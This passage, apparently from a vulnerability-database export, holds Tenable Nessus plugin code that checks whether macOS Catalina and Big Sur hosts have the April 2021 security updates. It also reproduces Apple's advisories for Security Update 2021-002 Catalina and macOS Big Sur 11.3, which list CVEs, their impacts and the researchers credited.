script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { \n 'max_version' : '10.15.7', \n 'min_version' : '10.15', \n 'fixed_build': '19H1030', \n 'fixed_display' : '10.15.7 Security Update 2021-002 Catalina' \n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:52", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.3 Big Sur. It is, therefore, affected by multiple vulnerabilities including the following:\n\n - A memory corruption issue which could allow an application restricted memory read access (CVE-2021-1808).\n\n - A memory corruption issue which could allow an application to cause unexpected system termination or to write kernel memory (CVE-2021-1828).\n\n - An out-of-bounds wirte issue which could allow a malicious application to execute arbitrary code with kernel privileges (CVE-2021-1834).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2021-04-28T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.3 (HT212325)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-7463", "CVE-2020-8037", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1814", "CVE-2021-1815", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1824", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1828", "CVE-2021-1829", "CVE-2021-1832", 
"CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1849", "CVE-2021-1851", "CVE-2021-1853", "CVE-2021-1855", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1859", "CVE-2021-1860", "CVE-2021-1861", "CVE-2021-1867", "CVE-2021-1868", "CVE-2021-1872", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1880", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-1883", "CVE-2021-1884", "CVE-2021-1885", "CVE-2021-30652", "CVE-2021-30653", "CVE-2021-30655", "CVE-2021-30657", "CVE-2021-30658", "CVE-2021-30659", "CVE-2021-30660", "CVE-2021-30661"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT212325.NASL", "href": "https://www.tenable.com/plugins/nessus/149041", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149041);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-7463\",\n \"CVE-2020-8037\",\n \"CVE-2020-8285\",\n \"CVE-2020-8286\",\n \"CVE-2021-1739\",\n \"CVE-2021-1740\",\n \"CVE-2021-1784\",\n \"CVE-2021-1808\",\n \"CVE-2021-1809\",\n \"CVE-2021-1810\",\n \"CVE-2021-1811\",\n \"CVE-2021-1813\",\n \"CVE-2021-1814\",\n \"CVE-2021-1815\",\n \"CVE-2021-1817\",\n \"CVE-2021-1820\",\n \"CVE-2021-1824\",\n \"CVE-2021-1825\",\n \"CVE-2021-1826\",\n \"CVE-2021-1828\",\n \"CVE-2021-1829\",\n \"CVE-2021-1832\",\n \"CVE-2021-1834\",\n \"CVE-2021-1839\",\n \"CVE-2021-1840\",\n \"CVE-2021-1841\",\n \"CVE-2021-1843\",\n \"CVE-2021-1846\",\n \"CVE-2021-1847\",\n \"CVE-2021-1849\",\n \"CVE-2021-1851\",\n \"CVE-2021-1853\",\n \"CVE-2021-1855\",\n \"CVE-2021-1857\",\n \"CVE-2021-1858\",\n \"CVE-2021-1859\",\n \"CVE-2021-1860\",\n \"CVE-2021-1861\",\n \"CVE-2021-1867\",\n \"CVE-2021-1868\",\n \"CVE-2021-1872\",\n \"CVE-2021-1873\",\n \"CVE-2021-1875\",\n 
\"CVE-2021-1876\",\n \"CVE-2021-1878\",\n \"CVE-2021-1880\",\n \"CVE-2021-1881\",\n \"CVE-2021-1882\",\n \"CVE-2021-1883\",\n \"CVE-2021-1884\",\n \"CVE-2021-1885\",\n \"CVE-2021-30652\",\n \"CVE-2021-30653\",\n \"CVE-2021-30655\",\n \"CVE-2021-30657\",\n \"CVE-2021-30658\",\n \"CVE-2021-30659\",\n \"CVE-2021-30660\",\n \"CVE-2021-30661\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212325\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2021-04-26-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"macOS 11.x < 11.3 (HT212325)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.3 Big Sur. It is, therefore,\naffected by multiple vulnerabilities including the following:\n\n - A memory corruption issue which could allow an application restricted memory read access (CVE-2021-1808).\n\n - A memory corruption issue which could allow an application to cause unexpected system termination or to \n write kernel memory (CVE-2021-1828).\n\n - An out-of-bounds wirte issue which could allow a malicious application to execute arbitrary code with \n kernel privileges (CVE-2021-1834).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212325\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30655\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [{ 'min_version' : '11.0', 'fixed_version' : '11.3', 'fixed_display' : 'macOS Big Sur 11.3' }];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2023-07-25T06:07:00", "description": "# About the security content of Security Update 2021-002 Catalina\n\nThis document describes the security content of Security Update 2021-002 Catalina.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Security Update 2021-002 Catalina\n\nReleased April 26, 2021\n\n**APFS**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\n**Archive Utility**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1810: Rasmus Sten (@pajp) of F-Secure\n\n**Audio**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\n**CFNetwork**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1857: an anonymous researcher\n\n**CoreAudio**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds read was addressed with improved input validation\n\nDescription: Processing a maliciously crafted audio file may disclose restricted memory.\n\nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added July 21, 
2021\n\n**CoreGraphics**\n\nAvailable for: macOS Catalina\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1847: Xuwei Liu of Purdue University\n\n**CoreText**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious server may be able to disclose active services\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8284: Marian Rehak\n\nEntry added May 6, 2021\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A buffer overflow was addressed with improved input validation.\n\nCVE-2020-8285: xnynx\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker may provide a fraudulent OCSP response that would appear valid\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8286: an anonymous researcher\n\n**DiskArbitration**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A permissions issue existed in DiskArbitration. 
This was addressed with additional ownership checks.\n\nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl (@theevilbit) of Offensive Security, and an anonymous researcher\n\n**FontParser**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1881: Hou JingYi (@hjy79425575) of Qihoo 360, an anonymous researcher, Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin of Trend Micro\n\n**FontParser**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27942: an anonymous researcher\n\n**Foundation**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-1813: Cees Elzinga\n\n**Foundation**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\n**ImageIO**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1843: Ye Zhang of Baidu Security\n\n**ImageIO**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds write issue was addressed with improved bounds checking\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-1858: Mickey Jin and Qi Sun of Trend Micro working with Trend Micro's Zero Day Initiative\n\nEntry added July 21, 2021\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious 
application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds write issue was addressed with improved bounds checking\n\nDescription: A malicious application may be able to execute arbitrary code with kernel privileges.\n\nCVE-2021-1841: Jack Dates of RET2 Systems, Inc.\n\nEntry added July 21, 2021\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1860: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1851: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: The issue was addressed with improved permissions logic\n\nDescription: Copied files may not have the expected file permissions.\n\nCVE-2021-1832: an anonymous researcher\n\nEntry added July 21, 2021\n\n**libxpc**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-30652: James Hutchins\n\n**libxslt**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: A double free issue was addressed with improved 
memory management.\n\nCVE-2021-1875: Found by OSS-Fuzz\n\n**Login Window**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application with root privileges may be able to access private information\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**NSRemoteView**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1876: Matthew Denton of Google Chrome\n\n**Preferences**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A parsing issue in the handling of directory paths was addressed with improved path validation.\n\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (https://xlab.tencent.com)\n\n**smbx**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker in a privileged network position may be able to leak sensitive user information\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos (talosintelligence.com)\n\n**System Preferences**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may bypass Gatekeeper checks. 
Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-30657: Cedric Owens (@cedowens)\n\nEntry added April 27, 2021, updated April 30, 2021 \n\n**Tailspin**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1868: Tim Michaud of Zoom Communications\n\n**tcpdump**\n\nAvailable for: macOS Catalina\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8037: an anonymous researcher\n\n**Time Machine**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications and Gary Nield of ECSC Group plc\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: The issue was addressed with improved permissions logic\n\nDescription: An application may be able to execute arbitrary code with system privileges.\n\nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim Michaud (@TimGMichaud) of Zoom Video Communications, Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added July 21, 2021\n\n**wifivelocityd**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2020-3838: Dayton Pidhirney 
(@_watbulb)\n\n**WindowServer**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to unexpectedly leak a user's credentials from secure text fields\n\nDescription: An API issue in Accessibility TCC permissions was addressed with improved state management.\n\nCVE-2021-1873: an anonymous researcher\n\nEntry updated April 27, 2021 \n\n\n\n## Additional recognition\n\n**CoreCrypto**\n\nWe would like to acknowledge Andy Russon of Orange Group for their assistance.\n\nEntry added May 6, 2021\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc. for their assistance.\n\nEntry added May 6, 2021\n\n**Kernel**\n\nWe would like to acknowledge Antonio Frighetto of Politecnico di Milano, GRIMM, Keyu Man, Zhiyun Qian, Zhongjie Wang, Xiaofeng Zheng, Youjun Huang, Haixin Duan, and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Mail**\n\nWe would like to acknowledge Petter Flink, SecOps of Bonnier News and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Safari**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Security**\n\nWe would like to acknowledge Xingwei Lin of Ant Security Light-Year Lab and john (@nyan_satan) for their assistance.\n\nEntry added May 6, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 21, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "apple", "title": "About the security content of Security Update 2021-002 Catalina", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27942", "CVE-2020-3838", "CVE-2020-8037", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1797", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1824", "CVE-2021-1828", "CVE-2021-1832", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1851", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1860", "CVE-2021-1868", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-30652", "CVE-2021-30655", "CVE-2021-30657"], "modified": "2021-04-26T00:00:00", "id": "APPLE:F7DADB3E958148A6B63512580383CEA2", "href": 
"https://support.apple.com/kb/HT212326", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T22:02:56", "description": "# About the security content of macOS Big Sur 11.3\n\nThis document describes the security content of macOS Big Sur 11.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.3\n\nReleased April 26, 2021\n\n**APFS**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1853: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of Zoom Video Communications\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An issue in code signature validation was addressed with improved checks.\n\nCVE-2021-1849: Siguza\n\n**Apple Neural Engine**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1867: Zuozhi Fan (@pattern_F_) and Wish Wu(\u5434\u6f4d\u6d60) of Ant Group Tianqiong Security Lab\n\n**Archive Utility**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1810: Rasmus 
Sten (@pajp) of F-Secure\n\nEntry updated on April 27, 2021 \n\n**Audio**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\n**CFNetwork**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1857: an anonymous researcher\n\n**Compression**\n\nAvailable for: macOS Big Sur\n\nImpact: An out-of-bounds read was addressed with improved input validation\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-30752: Ye Zhang (@co0py_Cat) of Baidu Security\n\nEntry added July 21, 2021 \n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-30664: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added May 6, 2021\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted audio file may disclose restricted memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreFoundation**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-30659: Thijs Alkemade 
of Computest\n\n**CoreGraphics**\n\nAvailable for: macOS Big Sur\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1847: Xuwei Liu of Purdue University\n\n**CoreText**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious server may be able to disclose active services\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8284: Marian Rehak\n\nEntry added May 6, 2021\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker may provide a fraudulent OCSP response that would appear valid\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8286: an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A buffer overflow was addressed with improved input validation.\n\nCVE-2020-8285: xnynx\n\n**DiskArbitration**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A permissions issue existed in DiskArbitration. 
This was addressed with additional ownership checks.\n\nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl (@theevilbit) of Offensive Security, and an anonymous researcher\n\n**FaceTime**\n\nAvailable for: macOS Big Sur\n\nImpact: Muting a CallKit call while ringing may not result in mute being enabled\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1872: Siraj Zaneer of Facebook\n\n**FontParser**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1881: an anonymous researcher, Xingwei Lin of Ant Security Light-Year Lab, Mickey Jin of Trend Micro, and Hou JingYi (@hjy79425575) of Qihoo 360\n\n**Foundation**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\n**Foundation**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-1813: Cees Elzinga\n\n**Heimdal**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted server messages may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1883: Gabe Kirkpatrick (@gabe_k)\n\n**Heimdal**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1884: Gabe Kirkpatrick (@gabe_k)\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1880: Xingwei Lin of 
Ant Security Light-Year Lab\n\nCVE-2021-30653: Ye Zhang of Baidu Security\n\nCVE-2021-1814: Ye Zhang of Baidu Security, Mickey Jin & Qi Sun of Trend Micro, and Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1843: Ye Zhang of Baidu Security\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1885: CFF of Topsec Alpha Team\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1858: Mickey Jin of Trend Micro\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: An out-of-bounds write was addressed with improved input validation\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-30743: Ye Zhang (@co0py_Cat) of Baidu 